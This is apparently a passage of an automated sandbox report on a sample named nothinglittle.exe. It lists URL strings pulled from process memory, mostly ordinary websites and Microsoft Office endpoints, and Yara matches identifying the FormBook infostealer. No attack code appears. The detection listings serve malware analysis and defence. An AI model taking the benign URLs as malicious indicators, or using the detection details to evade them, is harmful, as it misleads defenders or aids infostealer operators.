Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.office.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.onedrive.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://augloop.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cdn.entity.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cortana.ai/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://cr.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://directory.services.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://graph.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://graph.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://login.windows.local
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://management.azure.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://management.azure.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://messaging.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://officeapps.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://onedrive.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://outlook.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: nothinglittle.exe.9.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: nothinglittle.exe.9.dr String found in binary or memory: https://sectigo.com/CPS0U
Source: nothinglittle.exe.9.dr String found in binary or memory: https://secure.comodo.com/CPS0L
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://settings.outlook.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://tasks.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/7
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=06
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
